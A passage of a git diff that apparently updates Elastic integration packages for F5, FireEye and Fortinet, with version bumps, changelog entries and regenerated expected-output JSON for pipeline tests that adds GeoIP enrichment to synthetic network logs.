failure olor", "event": { - "ingested": "2021-06-09T10:31:52.609039100Z" + "ingested": "2021-12-14T14:42:51.960218318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/f5/manifest.yml b/packages/f5/manifest.yml index 60aeb7cb523..21d900180eb 100644 --- a/packages/f5/manifest.yml +++ b/packages/f5/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: f5 title: F5 Logs -version: 0.7.0 +version: 0.7.1 description: Collect and parse logs from F5 devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/fireeye/changelog.yml b/packages/fireeye/changelog.yml index 6be6284a745..4aaf07cb89d 100644 --- a/packages/fireeye/changelog.yml +++ b/packages/fireeye/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.1.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json index 90943f549f8..269f4bfeda0 100644 --- a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json +++ b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json @@ -1,6 +1,20 @@ { "expected": [ { + "observer": { + "product": "NX", + "vendor": "Fireeye" + }, + "@timestamp": "2020-09-22T08:34:44.991Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "fe80:0000:0000:0000:feec:daff:fe31:b706", + "ff02:0000:0000:0000:0000:0000:0000:0001" + ] + }, "fireeye": { "nx": { "flow_id": 721570461162990, 
@@ -28,6 +42,11 @@ "packets": 8, "ip": "fe80:0000:0000:0000:feec:daff:fe31:b706" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890344775Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.991339+0000\\\",\\\"flow_id\\\":721570461162990,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":45944,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:12.761326+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:12.761348+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"timeout\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":520,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], 
@@ -36,28 +55,23 @@ "community_id": "1:McNAQcsUcKZYOHHZYm0sD8JiBLc=", "transport": "udp", "iana_number": 17 - }, + } + }, + { "observer": { "product": "NX", "vendor": "Fireeye" }, - "@timestamp": "2020-09-22T08:34:44.991Z", + "@timestamp": "2020-09-22T08:34:44.993Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "fe80:0000:0000:0000:feec:daff:fe31:b706", - "ff02:0000:0000:0000:0000:0000:0000:0001" + "192.168.1.15", + "67.43.156.14" ] }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999899300Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.991339+0000\\\",\\\"flow_id\\\":721570461162990,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":45944,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:12.761326+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:12.761348+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"timeout\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":520,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" - } - }, - { "fireeye": { "nx": { "flow_id": 175370876476591, @@ -72,11 +86,23 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "port": 123, "bytes": 90, - "packets": 1, - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "packets": 1 }, "source": { "address": "192.168.1.15", 
@@ -85,6 +111,11 @@ "packets": 1, "ip": "192.168.1.15" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890347241Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993228+0000\\\",\\\"flow_id\\\":175370876476591,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":39808,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:33:15.122031+0000\\\",\\\"end\\\":\\\"2020-09-22T08:33:15.193693+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":475,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], @@ -93,7 +124,9 @@ "community_id": "1:RXq9OIqNb6ISMqP+R+uVnsOCMAc=", "transport": "udp", "iana_number": 17 - }, + } + }, + { "observer": { "product": "NX", "vendor": "Fireeye" 
@@ -104,17 +137,10 @@ }, "related": { "ip": [ - "192.168.1.15", - "67.43.156.14" + "fe80:0000:0000:0000:feec:daff:fe31:b706", + "ff02:0000:0000:0000:0000:0000:0000:0001" ] }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999903100Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993228+0000\\\",\\\"flow_id\\\":175370876476591,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":39808,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:33:15.122031+0000\\\",\\\"end\\\":\\\"2020-09-22T08:33:15.193693+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":475,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" - } - }, - { "fireeye": { "nx": { "flow_id": 1285126005631046, 
@@ -142,6 +168,11 @@ "packets": 8, "ip": "fe80:0000:0000:0000:feec:daff:fe31:b706" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890347696Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993227+0000\\\",\\\"flow_id\\\":1285126005631046,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":44535,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:22.763974+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:22.764073+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":522,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], @@ -150,7 +181,9 @@ "community_id": "1:99eFhjuGzHgOvXPRAgULIELViPs=", "transport": "udp", "iana_number": 17 - }, + } + }, + { "observer": { "product": "NX", "vendor": "Fireeye" 
@@ -161,17 +194,10 @@ }, "related": { "ip": [ - "fe80:0000:0000:0000:feec:daff:fe31:b706", - "ff02:0000:0000:0000:0000:0000:0000:0001" + "192.168.1.150", + "67.43.156.15" ] }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999909200Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993227+0000\\\",\\\"flow_id\\\":1285126005631046,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":44535,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:22.763974+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:22.764073+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":522,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" - } - }, - { "fireeye": { "nx": { "tcp": { @@ -195,11 +221,23 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.15", "port": 5938, "bytes": 59808, - "packets": 544, - "ip": "67.43.156.15" + "ip": "67.43.156.15", + "packets": 544 }, "source": { "address": "192.168.1.150", 
@@ -208,6 +246,11 @@ "packets": 799, "ip": "192.168.1.150" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890348089Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993286+0000\\\",\\\"flow_id\\\":222460015300681,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"src_port\\\":51082,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":5938,\\\"proto\\\":\\\"TCP\\\",\\\"proto_number\\\":6,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":799,\\\"pkts_toclient\\\":544,\\\"bytes_toserver\\\":69825,\\\"bytes_toclient\\\":59808,\\\"start\\\":\\\"2020-09-22T04:48:48.282697+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:36.067255+0000\\\",\\\"age\\\":13548,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false},\\\"tcp\\\":{\\\"tcp_flags\\\":\\\"1a\\\",\\\"tcp_flags_ts\\\":\\\"1a\\\",\\\"tcp_flags_tc\\\":\\\"1a\\\",\\\"syn\\\":true,\\\"psh\\\":true,\\\"ack\\\":true,\\\"state\\\":\\\"established\\\"}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":611,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], @@ -216,7 +259,9 @@ "community_id": "1:45/AGSM9JqMdS9WIK3bAZqim3A4=", "transport": "tcp", "iana_number": 6 - }, + } + }, + { "observer": { "product": "NX", "vendor": "Fireeye" 
@@ -227,17 +272,10 @@ }, "related": { "ip": [ - "192.168.1.150", - "67.43.156.15" + "192.168.1.15", + "67.43.156.14" ] }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999915900Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993286+0000\\\",\\\"flow_id\\\":222460015300681,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"src_port\\\":51082,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":5938,\\\"proto\\\":\\\"TCP\\\",\\\"proto_number\\\":6,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":799,\\\"pkts_toclient\\\":544,\\\"bytes_toserver\\\":69825,\\\"bytes_toclient\\\":59808,\\\"start\\\":\\\"2020-09-22T04:48:48.282697+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:36.067255+0000\\\",\\\"age\\\":13548,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false},\\\"tcp\\\":{\\\"tcp_flags\\\":\\\"1a\\\",\\\"tcp_flags_ts\\\":\\\"1a\\\",\\\"tcp_flags_tc\\\":\\\"1a\\\",\\\"syn\\\":true,\\\"psh\\\":true,\\\"ack\\\":true,\\\"state\\\":\\\"established\\\"}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":611,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" - } - }, - { "fireeye": { "nx": { "flow_id": 1463569002949603, @@ -252,11 +290,23 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "port": 123, "bytes": 90, - "packets": 1, - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "packets": 1 }, "source": { "address": "192.168.1.15", 
@@ -265,6 +315,11 @@ "packets": 1, "ip": "192.168.1.15" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890348500Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993501+0000\\\",\\\"flow_id\\\":1463569002949603,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":52147,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:32:06.355299+0000\\\",\\\"end\\\":\\\"2020-09-22T08:32:06.439495+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":476,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], 
@@ -273,25 +328,6 @@ "community_id": "1:lPFhChZNfHDZ1i2YD0w8DBTTAf0=", "transport": "udp", "iana_number": 17 - }, - "observer": { - "product": "NX", - "vendor": "Fireeye" - }, - "@timestamp": "2020-09-22T08:34:44.993Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.15", - "67.43.156.14" - ] - }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999921200Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993501+0000\\\",\\\"flow_id\\\":1463569002949603,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":52147,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:32:06.355299+0000\\\",\\\"end\\\":\\\"2020-09-22T08:32:06.439495+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":476,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { @@ -301,8 +337,20 @@ } }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 443, "ip": "67.43.156.13" }, "source": { 
@@ -397,7 +445,7 @@ }, "event": { "type": "tls", - "ingested": "2021-12-09T13:37:16.999927600Z", + "ingested": "2021-12-14T14:42:55.890348883Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:01.175635+0000\\\",\\\"flow_id\\\":1136872856843530,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"tls\\\",\\\"src_ip\\\":\\\"192.168.1.99\\\",\\\"src_port\\\":53918,\\\"dest_ip\\\":\\\"67.43.156.13\\\",\\\"dest_port\\\":443,\\\"proto\\\":\\\"TCP\\\",\\\"tls\\\":{\\\"subject\\\":\\\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\\\",\\\"issuerdn\\\":\\\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\\\",\\\"ja3\\\":{\\\"hash\\\":\\\"21536525fbf9e289f79e0f98af64bb59\\\",\\\"string\\\":\\\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\\\"},\\\"ja3s\\\":{\\\"hash\\\":\\\"9873b112313d7c4e5e8ef6207e6c6f0d\\\",\\\"string\\\":\\\"771,49195,0-65281-11-13172\\\"},\\\"fingerprint\\\":\\\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\\\",\\\"sni\\\":\\\"cloud.fireeye.com\\\",\\\"version\\\":\\\"TLS 1.2\\\",\\\"notbefore\\\":\\\"2020-07-01T00:00:00.000000+0000\\\",\\\"notafter\\\":\\\"2021-07-01T12:00:00.000000+0000\\\",\\\"client_ciphersuites\\\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\\\"client_tls_exts\\\":[0,11,10,13,15,13172],\\\"server_ciphersuite\\\":49195,\\\"server_tls_exts\\\":[0,65281,11,13172],\\\"pubkeylength\\\":65}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":1146,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, 
@@ -467,7 +515,7 @@ }, "event": { "type": "fileinfo", - "ingested": "2021-12-09T13:37:16.999933900Z", + "ingested": "2021-12-14T14:42:55.890349285Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:19.906154+0000\\\",\\\"flow_id\\\":1444203537876422,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"fileinfo\\\",\\\"src_ip\\\":\\\"192.168.1.222\\\",\\\"src_port\\\":47220,\\\"dest_ip\\\":\\\"192.168.100.31\\\",\\\"dest_port\\\":5601,\\\"proto\\\":\\\"TCP\\\",\\\"http\\\":{\\\"hostname\\\":\\\"192.168.100.31\\\",\\\"url\\\":\\\"\\\\/internal\\\\/search\\\\/es\\\",\\\"http_user_agent\\\":\\\"Mozilla\\\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\\\/537.36 (KHTML, like Gecko) Chrome\\\\/85.0.4183.102 Safari\\\\/537.36\\\",\\\"http_refer\\\":\\\"http:\\\\/\\\\/192.168.100.31:5601\\\\/app\\\\/kibana\\\",\\\"http_method\\\":\\\"POST\\\",\\\"protocol\\\":\\\"HTTP\\\\/1.1\\\",\\\"length\\\":0},\\\"app_proto\\\":\\\"http\\\",\\\"fileinfo\\\":{\\\"filename\\\":\\\"\\\\/internal\\\\/search\\\\/es\\\",\\\"magic\\\":\\\"ASCII text, with very long lines, with no line terminators\\\",\\\"state\\\":\\\"CLOSED\\\",\\\"md5\\\":\\\"548d03d3e11c009da833e6e59c4adfee\\\",\\\"stored\\\":false,\\\"size\\\":6394,\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":769,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" }, "user_agent": { @@ -491,8 +539,20 @@ } }, "destination": { - "port": 53, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.15", + "port": 53, "ip": "67.43.156.15" }, "dns": { 
@@ -535,7 +595,7 @@ }, "event": { "type": "dns", - "ingested": "2021-12-09T13:37:16.999940200Z", + "ingested": "2021-12-14T14:42:55.890349696Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:41.077232+0000\\\",\\\"flow_id\\\":206535698492848,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"dns\\\",\\\"src_ip\\\":\\\"192.168.1.176\\\",\\\"src_port\\\":60269,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":53,\\\"proto\\\":\\\"UDP\\\",\\\"dns\\\":{\\\"type\\\":\\\"query\\\",\\\"id\\\":28224,\\\"rrname\\\":\\\"time-ios.apple.com\\\",\\\"rrtype\\\":\\\"A\\\",\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":289,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } } diff --git a/packages/fireeye/manifest.yml b/packages/fireeye/manifest.yml index 25a739ab137..ee4b4a73a75 100644 --- a/packages/fireeye/manifest.yml +++ b/packages/fireeye/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: fireeye title: "Fireeye" -version: 1.1.1 +version: 1.1.2 license: basic description: "This Elastic integration collects Fireeye NX logs." type: integration diff --git a/packages/fortinet/changelog.yml b/packages/fortinet/changelog.yml index 2c7db9ccfeb..973d4e188d4 100644 --- a/packages/fortinet/changelog.yml +++ b/packages/fortinet/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json index 9d8f45c7cb2..5d33a04441a 100644 --- a/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json 
+++ b/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 29 06:09:59 boNemoe4402.www.invalid proto=udp service=http status=deny src=10.150.92.220 dst=10.102.123.34 src_port=7178 dst_port=3994 server_app=reeufugi pid=7880 app_name=enderitq traff_direct=external block_count=5286 logon_user=sumdo@litesse6379.api.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.233978400Z" + "ingested": "2021-12-14T14:42:59.419338933Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 12 13:12:33 olupt4880.api.home proto=icmp service=https status=deny src=10.33.212.159 dst=10.149.203.46 src_port=2789 dst_port=5861 server_app=vol pid=4539 app_name=uidolor traff_direct=internal block_count=4402 logon_user=mipsumq@gnaali6189.internal.localhost msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.233988400Z" + "ingested": "2021-12-14T14:42:59.419341852Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 aqu1628.internal.domain proto=ipv6-icmp service=smtp status=deny src=10.173.116.41 dst=10.118.175.9 src_port=3710 dst_port=2802 server_app=aer pid=445 app_name=nse traff_direct=unknown block_count=7019 logon_user=uame@quis1130.internal.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.233993Z" + "ingested": "2021-12-14T14:42:59.419342312Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 12 03:17:42 tinculp2940.internal.local proto=ggp service=https status=deny src=10.134.137.177 dst=10.202.204.154 src_port=7868 dst_port=3587 server_app=amco pid=5712 app_name=psumquia traff_direct=unknown block_count=2458 logon_user=orsitame@reprehe189.internal.home msg=success", "event": { - "ingested": "2021-12-09T13:37:20.233998100Z" + 
"ingested": "2021-12-14T14:42:59.419342695Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 26 10:20:16 rad2103.api.domain proto=ipv6-icmp service=pop3 status=deny src=10.245.142.250 dst=10.70.0.60 src_port=5408 dst_port=4982 server_app=estqui pid=6557 app_name=magn traff_direct=inbound block_count=2638 logon_user=eos@enimad2283.internal.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234003800Z" + "ingested": "2021-12-14T14:42:59.419343075Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 9 17:22:51 enim5316.www5.local proto=ipv6-icmp service=smtp status=deny src=10.202.72.124 dst=10.200.188.142 src_port=4665 dst_port=7143 server_app=omnis pid=2061 app_name=eip traff_direct=external block_count=513 logon_user=iusmodt@doloreeu3553.www5.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234009100Z" + "ingested": "2021-12-14T14:42:59.419343509Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 reetdolo2770.www5.local proto=tcp service=pop3 status=deny src=10.12.44.169 dst=10.214.225.125 src_port=5710 dst_port=2121 server_app=inBCSedu pid=5722 app_name=tanimi traff_direct=outbound block_count=6071 logon_user=erep@iutal13.api.localdomain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234013400Z" + "ingested": "2021-12-14T14:42:59.419343927Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 8 07:27:59 isiu1114.internal.corp proto=icmp service=http status=deny src=10.66.108.11 dst=10.198.136.50 src_port=6875 dst_port=2089 server_app=ipis pid=5037 app_name=ari traff_direct=unknown block_count=3856 logon_user=uptatev@uovol492.www.localhost msg=unknown", 
